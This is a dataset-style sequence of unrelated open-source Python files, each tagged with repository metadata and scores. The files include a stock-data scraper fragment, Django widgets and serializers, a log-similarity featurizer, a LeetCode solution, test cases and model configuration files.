print('getPEAData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getPEAData()
print('getPbData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getPbData()
print('getguxiData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getguxiData()
print('getvalueData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getvalueData()
print('getRoeaData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getRoeaData()
print('getProfitData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getProfitData()
print('getIncomeData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getIncomeData()
print('getprofitkfData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getprofitkfData()
print('getdebtratioData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getdebtratioData()
print('getcashflowData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getcashflowData()
print('getgrossprofitData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getgrossprofitData()
print('getCawuData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.insertDayData()
s.insertYearData()
s.getCawuData()
print('end:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.done()
# time.sleep(2)
def getStoke():
Sql = "select * from main_list where done!='ok'"
try:
dataList = db.query(Sql)
except Exception as e:
print(e)
# print(len(dataList))
dd = dataList.as_dict()
# print(dd[0])
# {'id': None, 'stock_abbr': 'pfyh', 'stock_id': 'sh600000', 'stock_name': '浦发银行', 'stock_number': '600000',
# 'stock_pinyin': 'pufayinhang', 'dt': datetime.datetime(2021, 4, 23, 8, 21, 30)}
for d in dd:
getAlldata(d['stock_id'])
getStoke()
# getAlldata('hk01626') | 2.75 | 3 |
wymeditor/widgets.py | mbi/django-wymeditor | 1 | 12772920 | <filename>wymeditor/widgets.py<gh_stars>1-10
from django import forms
from django.conf import settings
from django.contrib.admin import widgets
class WYMEditorArea(forms.Textarea):
def __init__(self, attrs={}):
base_class = attrs.get("class", "")
attrs['class'] = " ".join((base_class, "WYMEditor",))
super(WYMEditorArea, self).__init__(attrs=attrs)
class Media:
css = {
"all": (
"//ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/smoothness/jquery-ui.css",
'%swymeditor/skins/twopanels/skin.css' % settings.STATIC_URL,
)
}
js = (
'//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js',
'%swymeditor/jquery.wymeditor.js' % settings.STATIC_URL,
'%sjs/load_wymeditor.js' % settings.STATIC_URL,
)
class AdminWYMEditorArea(widgets.AdminTextareaWidget, WYMEditorArea):
pass
| 2.03125 | 2 |
boosting_decision_making/boosting_featurizer.py | fossabot/service-auto-analyzer | 0 | 12772921 | <gh_stars>0
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
from utils import utils
from scipy import spatial
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
import logging
from threading import Thread
logger = logging.getLogger("analyzerApp.boosting_featurizer")
class BoostingFeaturizer:
def __init__(self, all_results, config, feature_ids):
self.config = config
self.prepare_word_vectors(all_results)
if "filter_min_should_match" in self.config:
for field in self.config["filter_min_should_match"]:
all_results = self.filter_by_min_should_match(all_results, field=field)
self.all_results = self.normalize_results(all_results)
self.scores_by_issue_type = None
self.feature_functions = {
0: (self._calculate_score, {}),
1: (self._calculate_place, {}),
3: (self._calculate_max_score_and_pos, {"return_val_name": "max_score_pos"}),
5: (self._calculate_min_score_and_pos, {"return_val_name": "min_score_pos"}),
7: (self._calculate_percent_count_items_and_mean, {"return_val_name": "cnt_items_percent"}),
9: (self._calculate_percent_issue_types, {}),
11: (self._calculate_similarity_percent, {"field_name": "message"}),
13: (self._calculate_similarity_percent, {"field_name": "merged_small_logs"}),
14: (self._has_test_item_several_logs, {}),
15: (self._has_query_several_logs, {}),
18: (self._calculate_similarity_percent, {"field_name": "detected_message"}),
19: (self._calculate_similarity_percent, {"field_name": "detected_message_with_numbers"}),
23: (self._calculate_similarity_percent, {"field_name": "stacktrace"}),
25: (self._calculate_similarity_percent, {"field_name": "only_numbers"}),
26: (self._calculate_max_score_and_pos, {"return_val_name": "max_score"}),
27: (self._calculate_min_score_and_pos, {"return_val_name": "min_score"}),
28: (self._calculate_percent_count_items_and_mean,
{"return_val_name": "mean_score"}),
}
if type(feature_ids) == str:
self.feature_ids = utils.transform_string_feature_range_into_list(feature_ids)
else:
self.feature_ids = feature_ids
class CountVectorizerThread(Thread):
def __init__(self, fields, all_results, min_word_length):
Thread.__init__(self)
self.fields = fields
self.min_word_length = min_word_length
self.all_results = all_results
self.dict_count_vectorizer = {}
self.all_text_field_ids = {}
def run(self):
for field in self.fields:
log_field_ids = {}
index_in_message_array = 0
count_vector_matrix = None
all_messages = []
for log, res in self.all_results:
for obj in [log] + res["hits"]["hits"]:
if obj["_id"] not in log_field_ids:
text = " ".join(utils.split_words(obj["_source"][field],
min_word_length=self.min_word_length))
if text.strip() == "":
log_field_ids[obj["_id"]] = -1
else:
all_messages.append(text)
log_field_ids[obj["_id"]] = index_in_message_array
index_in_message_array += 1
if len(all_messages) > 0:
vectorizer = CountVectorizer(binary=True, analyzer="word", token_pattern="[^ ]+")
count_vector_matrix = np.asarray(vectorizer.fit_transform(all_messages).toarray())
self.all_text_field_ids[field] = log_field_ids
self.dict_count_vectorizer[field] = count_vector_matrix
@utils.ignore_warnings
def prepare_word_vectors(self, all_results):
self.all_text_field_ids = {}
self.dict_count_vectorizer = {}
min_word_length = self.config["min_word_length"] if "min_word_length" in self.config else 0
threads = []
for fields in [["message", "detected_message", "detected_message_with_numbers"],
["merged_small_logs", "stacktrace", "only_numbers"]]:
thread = BoostingFeaturizer.CountVectorizerThread(fields, all_results, min_word_length)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
for thread in threads:
for field in thread.fields:
self.all_text_field_ids[field] = thread.all_text_field_ids[field]
self.dict_count_vectorizer[field] = thread.dict_count_vectorizer[field]
def filter_by_min_should_match(self, all_results, field="message"):
all_results = self.calculate_sim_percent_logs(all_results, field=field)
new_results = []
for log, res in all_results:
new_elastic_res = []
for elastic_res in res["hits"]["hits"]:
sim_field = "similarity_%s" % field\
if "similarity_%s" % field in elastic_res else "similarity_merged_small_logs"
if elastic_res[sim_field] >= self.config["min_should_match"]:
new_elastic_res.append(elastic_res)
if len(new_elastic_res) > 0:
new_results.append((log, {"hits": {"hits": new_elastic_res}}))
return new_results
def calculate_sim_percent_logs(self, all_results, field="message"):
rearranged_items = []
for log, res in all_results:
for elastic_res in res["hits"]["hits"]:
rearranged_items.append(((elastic_res["_id"], log["_id"]), log, elastic_res))
all_results_similarity, sim_field_dict =\
self._calculate_field_similarity(rearranged_items,
field,
for_filter=True)
for log, elastic_res in all_results:
for res in elastic_res["hits"]["hits"]:
group_id = (res["_id"], log["_id"])
res[sim_field_dict[group_id]] = all_results_similarity[group_id]
return all_results
def _calculate_field_similarity(self, items, field_name, for_filter=False):
all_results_similarity = {}
sim_field_dict = {}
for group_id, log, elastic_res in items:
sim_field = "similarity_%s" % field_name
field_to_check = field_name
if sim_field in elastic_res:
all_results_similarity[group_id] = elastic_res[sim_field]
continue
index_query_message = self.all_text_field_ids[field_to_check][log["_id"]]
index_log_message = self.all_text_field_ids[field_to_check][elastic_res["_id"]]
if index_query_message < 0 and index_log_message < 0:
if for_filter:
index_query_message = self.all_text_field_ids["merged_small_logs"][log["_id"]]
index_log_message = self.all_text_field_ids["merged_small_logs"][elastic_res["_id"]]
sim_field = "similarity_merged_small_logs"
field_to_check = "merged_small_logs"
else:
all_results_similarity[group_id] = 1.0
sim_field_dict[group_id] = sim_field
if index_query_message < 0 or index_log_message < 0:
if group_id not in all_results_similarity:
all_results_similarity[group_id] = 0.0
else:
all_results_similarity[group_id] =\
round(1 - spatial.distance.cosine(
self.dict_count_vectorizer[field_to_check][index_query_message],
self.dict_count_vectorizer[field_to_check][index_log_message]), 3)
return all_results_similarity, sim_field_dict
def _calculate_percent_issue_types(self):
scores_by_issue_type = self._calculate_score()
percent_by_issue_type = {}
for issue_type in scores_by_issue_type:
percent_by_issue_type[issue_type] = 1 / len(scores_by_issue_type)\
if len(scores_by_issue_type) > 0 else 0
return percent_by_issue_type
def _has_test_item_several_logs(self):
scores_by_issue_type = self.find_most_relevant_by_type()
has_several_logs_by_type = {}
for issue_type in scores_by_issue_type:
merged_small_logs =\
scores_by_issue_type[issue_type]["mrHit"]["_source"]["merged_small_logs"]
has_several_logs_by_type[issue_type] = int(merged_small_logs.strip() != "")
return has_several_logs_by_type
def _has_query_several_logs(self):
scores_by_issue_type = self.find_most_relevant_by_type()
has_several_logs_by_type = {}
for issue_type in scores_by_issue_type:
merged_small_logs =\
scores_by_issue_type[issue_type]["compared_log"]["_source"]["merged_small_logs"]
has_several_logs_by_type[issue_type] = int(merged_small_logs.strip() != "")
return has_several_logs_by_type
def find_most_relevant_by_type(self):
if self.scores_by_issue_type is not None:
return self.scores_by_issue_type
self.scores_by_issue_type = {}
for log, es_results in self.all_results:
for hit in es_results:
issue_type = hit["_source"]["issue_type"]
if issue_type not in self.scores_by_issue_type:
self.scores_by_issue_type[issue_type] = {
"mrHit": hit,
"compared_log": log,
"score": 0}
issue_type_item = self.scores_by_issue_type[issue_type]
if hit["_score"] > issue_type_item["mrHit"]["_score"]:
self.scores_by_issue_type[issue_type]["mrHit"] = hit
self.scores_by_issue_type[issue_type]["compared_log"] = log
for idx, hit in enumerate(es_results):
issue_type = hit["_source"]["issue_type"]
self.scores_by_issue_type[issue_type]["score"] +=\
(hit["normalized_score"] / self.total_normalized)
return self.scores_by_issue_type
def _calculate_score(self):
scores_by_issue_type = self.find_most_relevant_by_type()
return dict([(item, scores_by_issue_type[item]["score"]) for item in scores_by_issue_type])
def _calculate_place(self):
scores_by_issue_type = self._calculate_score()
place_by_issue_type = {}
for idx, issue_type_item in enumerate(sorted(scores_by_issue_type.items(),
key=lambda x: x[1],
reverse=True)):
place_by_issue_type[issue_type_item[0]] = 1 / (1 + idx)
return place_by_issue_type
def _calculate_max_score_and_pos(self, return_val_name="max_score"):
max_scores_by_issue_type = {}
for log, es_results in self.all_results:
for idx, hit in enumerate(es_results):
issue_type = hit["_source"]["issue_type"]
if issue_type not in max_scores_by_issue_type or\
hit["normalized_score"] > max_scores_by_issue_type[issue_type]["max_score"]:
max_scores_by_issue_type[issue_type] = {"max_score": hit["normalized_score"],
"max_score_pos": 1 / (1 + idx), }
return dict([(item, max_scores_by_issue_type[item][return_val_name])
for item in max_scores_by_issue_type])
def _calculate_min_score_and_pos(self, return_val_name="min_score"):
min_scores_by_issue_type = {}
for log, es_results in self.all_results:
for idx, hit in enumerate(es_results):
issue_type = hit["_source"]["issue_type"]
if issue_type not in min_scores_by_issue_type or\
hit["normalized_score"] < min_scores_by_issue_type[issue_type]["min_score"]:
min_scores_by_issue_type[issue_type] = {"min_score": hit["normalized_score"],
"min_score_pos": 1 / (1 + idx), }
return dict([(item, min_scores_by_issue_type[item][return_val_name])
for item in min_scores_by_issue_type])
def _calculate_percent_count_items_and_mean(self, return_val_name="mean_score", scaled=False):
cnt_items_by_issue_type = {}
cnt_items_glob = 0
for log, es_results in self.all_results:
cnt_items_glob += len(es_results)
for idx, hit in enumerate(es_results):
issue_type = hit["_source"]["issue_type"]
if issue_type not in cnt_items_by_issue_type:
cnt_items_by_issue_type[issue_type] = {"mean_score": 0,
"cnt_items_percent": 0, }
cnt_items_by_issue_type[issue_type]["cnt_items_percent"] += 1
cnt_items_by_issue_type[issue_type]["mean_score"] += hit["normalized_score"]
for issue_type in cnt_items_by_issue_type:
cnt_items_by_issue_type[issue_type]["mean_score"] /=\
cnt_items_by_issue_type[issue_type]["cnt_items_percent"]
cnt_items_by_issue_type[issue_type]["cnt_items_percent"] /= cnt_items_glob
return dict([(item, cnt_items_by_issue_type[item][return_val_name])
for item in cnt_items_by_issue_type])
def normalize_results(self, all_elastic_results):
all_results = []
max_score = 0
self.total_normalized = 0
for log, es_results in all_elastic_results:
for hit in es_results["hits"]["hits"]:
max_score = max(max_score, hit["_score"])
for log, es_results in all_elastic_results:
for hit in es_results["hits"]["hits"]:
hit["normalized_score"] = hit["_score"] / max_score
self.total_normalized += hit["normalized_score"]
for config_field in self.config:
hit[config_field] = self.config[config_field]
all_results.append((log, es_results["hits"]["hits"]))
return all_results
def _calculate_similarity_percent(self, field_name="message"):
scores_by_issue_type = self.find_most_relevant_by_type()
rearranged_items = []
for issue_type in scores_by_issue_type:
rearranged_items.append((issue_type,
scores_by_issue_type[issue_type]["compared_log"],
scores_by_issue_type[issue_type]["mrHit"]))
similarity_percent_by_type, sim_field_dict =\
self._calculate_field_similarity(rearranged_items,
field_name,
for_filter=False)
return similarity_percent_by_type
@utils.ignore_warnings
def gather_features_info(self):
"""Gather all features from feature_ids for a test item"""
gathered_data = []
issue_type_names = []
issue_type_by_index = {}
try:
issue_types = self.find_most_relevant_by_type()
for idx, issue_type in enumerate(issue_types):
gathered_data.append([])
issue_type_by_index[issue_type] = idx
issue_type_names.append(issue_type)
for feature in self.feature_ids:
func, args = self.feature_functions[feature]
result = func(**args)
for issue_type in result:
gathered_data[issue_type_by_index[issue_type]].append(round(result[issue_type], 3))
except Exception as err:
logger.error("Errors in boosting features calculation")
logger.error(err)
return gathered_data, issue_type_names
| 2.015625 | 2 |
src/leetcode_326_power_of_three.py | sungho-joo/leetcode2github | 0 | 12772922 | # @l2g 326 python3
# [326] Power of Three
# Difficulty: Easy
# https://leetcode.com/problems/power-of-three
#
# Given an integer n, return true if it is a power of three. Otherwise, return false.
# An integer n is a power of three, if there exists an integer x such that n == 3x.
#
# Example 1:
# Input: n = 27
# Output: true
# Example 2:
# Input: n = 0
# Output: false
# Example 3:
# Input: n = 9
# Output: true
# Example 4:
# Input: n = 45
# Output: false
#
#
# Constraints:
#
# -2^31 <= n <= 2^31 - 1
#
#
# Follow up: Could you solve it without loops/recursion?
class Solution:
def isPowerOfThree(self, n: int) -> bool:
if n <= 0:
return False
while n > 1:
div, rem = divmod(n, 3)
if rem != 0:
return False
n = div
return True if n == 1 else False
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_326.py")])
| 4.28125 | 4 |
testing/CinemaBaseTest.py | JonasLukasczyk/workbench | 0 | 12772923 | <reponame>JonasLukasczyk/workbench
import unittest
import numpy
import os
import matplotlib.pyplot as plt
from matplotlib.testing.compare import compare_images
class CinemaBaseTest(unittest.TestCase):
gold = "testing/gold"
scratch = "testing/scratch"
def __init__(self, *args, **kwargs):
super(CinemaBaseTest, self).__init__(*args, **kwargs)
def setUp(self):
try:
os.makedirs(CinemaBaseTest.scratch)
except OSError as error:
pass
print("Running test: {}".format(self._testMethodName))
def compare(self, a, b ):
results = compare_images( a, b, 1 )
return (results is None)
def test_cinema_image_compare(self):
result = self.compare( os.path.join(CinemaBaseTest.gold, "base", "000.png" ), os.path.join(CinemaBaseTest.gold, "base", "000.png" ) )
self.assertTrue(result)
| 2.484375 | 2 |
com/LimePencil/Q11866/Main.py | LimePencil/baekjoonProblems | 2 | 12772924 | import sys
from collections import deque
n, k = list(map(int,sys.stdin.readline().strip("\n").split(" ")))
circle = deque(list(range(1, n+1)))
order = []
for i in range(n):
for j in range(k):
if(k-1 !=j):
circle.append(circle.popleft())
else:
order.append(circle.popleft())
print("<" + ", ".join(str(x) for x in order) + ">")
| 3.34375 | 3 |
backend/cukiernia/serializers.py | MatMark/ZIwG | 3 | 12772925 | <filename>backend/cukiernia/serializers.py
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from .models import Product, ProductPhoto, TextBox, ComboBox, ComboBoxValue, OrderStatus, Order, Decoration, Delivery
from .models import Calendar, Category, Carousel, CarouselPhoto, RelatedProductJunction, InstantRetail, OnDemandRetail
class UserSerializer(serializers.HyperlinkedModelSerializer):
'''
This class is serializer for User model
'''
class Meta:
model = User
fields = ['url', 'username', 'email', 'groups']
class GroupSerializer(serializers.HyperlinkedModelSerializer):
'''
This class is serializer for Group model
'''
class Meta:
model = Group
fields = ['url', 'name']
class CustomUserSerializer(serializers.ModelSerializer):
"""
Currently unused in preference of the below.
"""
email = serializers.EmailField(
required=True
)
username = serializers.CharField()
password = serializers.CharField(min_length=8, write_only=True)
class Meta:
model = User
fields = ('email', 'username', 'password')
extra_kwargs = {'password': {'write_<PASSWORD>': True}}
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data) # as long as the fields are the same, we can just use this
if password is not None:
instance.set_password(password)
instance.save()
return instance
class ProductSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ['id', 'code', 'price', 'name_pl', 'name_en', 'product_description_pl',
'product_description_en', 'category', 'recommended']
class InstantRetailSerializer(serializers.ModelSerializer):
class Meta:
model = InstantRetail
fields = ['id', 'product', 'quantity_available']
class OnDemandRetailSerializer(serializers.ModelSerializer):
class Meta:
model = OnDemandRetail
fields = ['id', 'product', 'production_time']
class RelatedProductJunctionSerializer(serializers.ModelSerializer):
class Meta:
model = RelatedProductJunction
fields = ['id', 'related']
class ProductPhotoSerializer(serializers.ModelSerializer):
class Meta:
model = ProductPhoto
fields = ['id', 'product', 'main_photo', 'url']
class TextBoxSerializer(serializers.ModelSerializer):
class Meta:
model = TextBox
fields = ['id', 'name_pl', 'name_en', 'product', 'is_required', 'max_length']
class ComboBoxSerializer(serializers.ModelSerializer):
class Meta:
model = ComboBox
fields = ['id', 'name_pl', 'name_en', 'product', 'is_required']
class CalendarSerializer(serializers.ModelSerializer):
model = Calendar
fields = ['id', 'name_pl', 'name_en', 'is_required', 'product']
class ComboBoxValueSerializer(serializers.ModelSerializer):
class Meta:
model = ComboBoxValue
fields = ['id', 'text_en', 'text_pl', 'combo_box', 'price_factor']
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = ['id', 'name_pl', 'name_en']
class CarouselSerializer(serializers.ModelSerializer):
class Meta:
model = Carousel
fields = ['id', 'enabled']
class CarouselPhotoSerializer(serializers.ModelSerializer):
class Meta:
model = CarouselPhoto
fields = ['id', 'url']
class OrderSerializer(serializers.ModelSerializer):
class Meta:
model = Order
fields = ['id', 'order_date', 'delivery_date', 'status', 'street', 'postcode',
'city', 'courier_note', 'dealer_note', 'delivery', 'price', 'products', 'user']
class DeliverySerializer(serializers.ModelSerializer):
class Meta:
model= Delivery
fields = ['id', 'name_pl', 'name_en', 'price']
class OrderStatusSerializer(serializers.ModelSerializer):
class Meta:
model= OrderStatus
fields = ['id', 'name_pl', 'name_en']
class DecorationSerializer(serializers.ModelSerializer):
class Meta:
model = Decoration
fields = ['id', 'name_en', 'name_pl', 'value_pl', 'value_en', 'order', 'product', 'price'] | 2.265625 | 2 |
cloudpathlib/local/__init__.py | kabirkhan/cloudpathlib | 128 | 12772926 | <filename>cloudpathlib/local/__init__.py
"""This module implements "Local" classes that mimic their associated `cloudpathlib` non-local
counterparts but use the local filesystem in place of cloud storage. They can be used as drop-in
replacements, with the intent that you can use them as mock or monkepatch substitutes in your
tests. See ["Testing code that uses cloudpathlib"](../../testing_mocked_cloudpathlib/) for usage
examples.
"""
from .implementations import (
local_azure_blob_implementation,
LocalAzureBlobClient,
LocalAzureBlobPath,
local_gs_implementation,
LocalGSClient,
LocalGSPath,
local_s3_implementation,
LocalS3Client,
LocalS3Path,
)
from .localclient import LocalClient
from .localpath import LocalPath
__all__ = [
"local_azure_blob_implementation",
"LocalAzureBlobClient",
"LocalAzureBlobPath",
"LocalClient",
"local_gs_implementation",
"LocalGSClient",
"LocalGSPath",
"LocalPath",
"local_s3_implementation",
"LocalS3Client",
"LocalS3Path",
]
| 2.28125 | 2 |
lib/base/framework.py | dromero1452/shellsploit-framework | 2 | 12772927 | <gh_stars>1-10
from lib.core.base import Base
from lib.payloads.shellcode import Shellcode
class ShellsploitFramework(Base, Shellcode):
def __init__(self):
super(Base, self).__init__()
super(Shellcode, self).__init__()
| 1.835938 | 2 |
tests/test_case_style.py | xkumiyu/case-style-changer | 2 | 12772928 | import pytest
from case_style_changer.case_style import CamelCase
from case_style_changer.case_style import CapitalCase
from case_style_changer.case_style import Case
from case_style_changer.case_style import ConstantCase
from case_style_changer.case_style import KebabCase
from case_style_changer.case_style import PascalCase
from case_style_changer.case_style import SentenceCase
from case_style_changer.case_style import SnakeCase
@pytest.mark.parametrize(
"string, expected",
[
("camel", CamelCase),
("pascal", PascalCase),
("snake", SnakeCase),
("constant", ConstantCase),
("kebab", KebabCase),
("sentence", SentenceCase),
("capital", CapitalCase),
],
)
def test_from_string(string, expected):
case = Case.from_string(string)
assert case == expected
def test_from_string_gives_error():
with pytest.raises(Exception):
Case.from_string("")
def test_no_duplicates_in_the_available_list():
available_list = Case.available_list()
expected_length = len(available_list)
length = len(set(available_list))
assert length == expected_length
| 2.546875 | 3 |
src/wai/annotations/core/component/_ProcessorComponent.py | waikato-ufdl/wai-annotations-core | 0 | 12772929 | from abc import ABC
from ..stream import StreamProcessor, InputElementType, OutputElementType
from ._Component import Component
class ProcessorComponent(
StreamProcessor[InputElementType, OutputElementType],
Component,
ABC
):
"""
Base class for plugin ISPs.
"""
pass
| 1.789063 | 2 |
kasuga/wordholder.py | hashimom/kasuga | 3 | 12772930 | <reponame>hashimom/kasuga
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018-2019 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import csv
import numpy as np
import tensorflow as tf
WORD_TYPE_LIST = [
[
"形容詞",
"連体詞",
"副詞",
"判定詞",
"助動詞",
"接続詞",
"指示詞",
"感動詞",
"名詞",
"動詞",
"助詞",
"接頭辞",
"接尾辞",
"特殊",
"未定義語"
],
[
"形容詞",
"連体詞",
"副詞",
"判定詞",
"助動詞",
"接続詞",
"名詞形態指示詞",
"連体詞形態指示詞",
"副詞形態指示詞",
"感動詞",
"普通名詞",
"副詞的名詞",
"形式名詞",
"固有名詞",
"組織名",
"地名",
"人名",
"サ変名詞",
"数詞",
"時相名詞",
"動詞",
"格助詞",
"副助詞",
"接続助詞",
"終助詞",
"名詞接頭辞",
"動詞接頭辞",
"イ形容詞接頭辞",
"ナ形容詞接頭辞",
"名詞性名詞接尾辞",
"名詞性述語接尾辞",
"名詞性名詞助数辞",
"名詞性特殊接尾辞",
"形容詞性述語接尾辞",
"形容詞性名詞接尾辞",
"動詞性接尾辞",
"句点",
"読点",
"括弧始",
"括弧終",
"記号",
"空白",
"カタカナ",
"アルファベット",
"その他"
]
]
WORD_ID_BIT_NUM = 16
class WordHolder:
def __init__(self, list_file=None):
self.word_list = {}
self.type1_one_hot = np.eye(len(WORD_TYPE_LIST[0]))
self.type2_one_hot = np.eye(len(WORD_TYPE_LIST[1]))
# word file read
if list_file is not None:
with open(list_file, "r", encoding="utf-8") as f:
reader = csv.reader(f, delimiter=",")
for row in reader:
self.word_list[row[0]] = {"id": row[1], "type1": row[2], "type2": row[3]}
def __call__(self, surface):
id_ary = []
tmp = int(self.word_list[surface]["id"])
for i in range(WORD_ID_BIT_NUM):
if tmp & 1:
id_ary.append(1.)
else:
id_ary.append(0.)
tmp = tmp >> 1
ret_ary = np.array(id_ary, dtype="float")
ret_ary = np.hstack((ret_ary, self.type1_one_hot[int(self.word_list[surface]["type1"])]))
ret_ary = np.hstack((ret_ary, self.type2_one_hot[int(self.word_list[surface]["type2"])]))
return ret_ary
def regist(self, surface, type1, type2):
if not surface in self.word_list:
word_id = np.random.randint(0, 65535)
if type2 != "*":
self.word_list[surface] = {"id": word_id,
"type1": WORD_TYPE_LIST[0].index(type1),
"type2": WORD_TYPE_LIST[1].index(type2)}
else:
self.word_list[surface] = {"id": word_id,
"type1": WORD_TYPE_LIST[0].index(type1),
"type2": WORD_TYPE_LIST[0].index(type1)}
def save(self, filename):
with open(filename, 'w', encoding="utf-8") as f:
writer = csv.writer(f, lineterminator='\n')
for k, v in self.word_list.items():
writer.writerow([k, v["id"], v["type1"], v["type2"]])
@staticmethod
def type_list_cnt():
return [len(WORD_TYPE_LIST[0]), len(WORD_TYPE_LIST[1])]
| 1.078125 | 1 |
planet_express.py | srobo/kit-packages | 0 | 12772931 | <reponame>srobo/kit-packages
"""Our crew is replaceable, your package isn't!"""
import subprocess
from pathlib import Path
from shutil import move
from typing import List
# NB: These are manually dependency sorted!
# TODO: Tree shaking or DAG or equivalent
PACKAGES: List[str] = [
"python-dbus-next",
"python-gmqtt",
"python-pyquaternion",
"python-zoloto",
"udiskie-minimal",
"python-astoria",
"python-j5",
"python-j5-zoloto",
"python-sr-robot3",
"astoria-udiskie",
"srobo-kit",
]
CURR_PATH = Path(".")
BUILD_PATH = Path("/tmp/build")
def build_package(name: str) -> None:
"""Build it."""
package_dir = CURR_PATH.joinpath(name)
assert package_dir.exists()
assert package_dir.joinpath("PKGBUILD").exists()
print(f"\tFound directory and PKGBUILD")
subprocess.run(["makepkg", "-si", "--noconfirm"], cwd=package_dir)
package_files = [x for x in package_dir.glob("*.pkg.tar.*")]
assert len(package_files) != 0
print(f"\t{len(package_files)} packages have been produced.")
for pkg in package_files:
move(pkg, BUILD_PATH / pkg.name)
if __name__ == "__main__":
print("PLANET EXPRESS PACKAGE DELIVERY")
print(__doc__)
print("")
for package in PACKAGES:
print(f"Building {package}")
build_package(package)
| 2.421875 | 2 |
built-in/PyTorch/Official/cv/image_object_detection/YoloV3_ID1790_for_PyTorch/configs/legacy_1.x/mask_rcnn_r50_fpn_1x_coco_v1.py | Ascend/modelzoo | 12 | 12772932 | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
_base_ = [
'../_base_/models/mask_rcnn_r50_fpn.py',
'../_base_/datasets/coco_instance.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
rpn_head=dict(
anchor_generator=dict(type='LegacyAnchorGenerator', center_offset=0.5),
bbox_coder=dict(type='LegacyDeltaXYWHBBoxCoder'),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
roi_head=dict(
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(
type='RoIAlign',
output_size=7,
sampling_ratio=2,
aligned=False)),
mask_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(
type='RoIAlign',
output_size=14,
sampling_ratio=2,
aligned=False)),
bbox_head=dict(
bbox_coder=dict(type='LegacyDeltaXYWHBBoxCoder'),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))))
# model training and testing settings
train_cfg = dict(
rpn_proposal=dict(nms_post=2000, max_num=2000),
rcnn=dict(assigner=dict(match_low_quality=True)))
| 1.320313 | 1 |
tests/test_issues/test_issue_8.py | hsolbrig/pyjsg | 3 | 12772933 |
import unittest
class Issue8TestCase(unittest.TestCase):
def test_none_as_string_instance(self):
from pyjsg.jsglib import JSGString, JSGPattern
class S(JSGString):
pattern = JSGPattern(r'[a-zA-Z]+')
self.assertTrue(isinstance('abc', S))
self.assertFalse(isinstance('abc1', S))
self.assertFalse(isinstance('', S))
self.assertFalse(isinstance(None, S))
if __name__ == '__main__':
unittest.main()
| 2.953125 | 3 |
physionet-django/search/forms.py | Lucas-Mc/physionet-build | 36 | 12772934 | from django import forms
class TopicSearchForm(forms.Form):
topic = forms.CharField(max_length=50, required=False, label='')
class ProjectOrderForm(forms.Form):
ORDER_CHOICES = (
('relevance-desc', 'Relevance'),
('publish_datetime-desc', 'Latest'),
('publish_datetime-asc', 'Oldest'),
('title-asc', 'Title (Asc.)'),
('title-desc', 'Title (Desc.)'),
('main_storage_size-asc', 'Size (Asc.)'),
('main_storage_size-desc', 'Size (Desc.)'),
)
orderby = forms.ChoiceField(choices=ORDER_CHOICES, label='')
def clean_order_by(self):
pass
class ProjectTypeForm(forms.Form):
PROJECT_TYPES = (
(0, 'Data'),
(1, 'Software'),
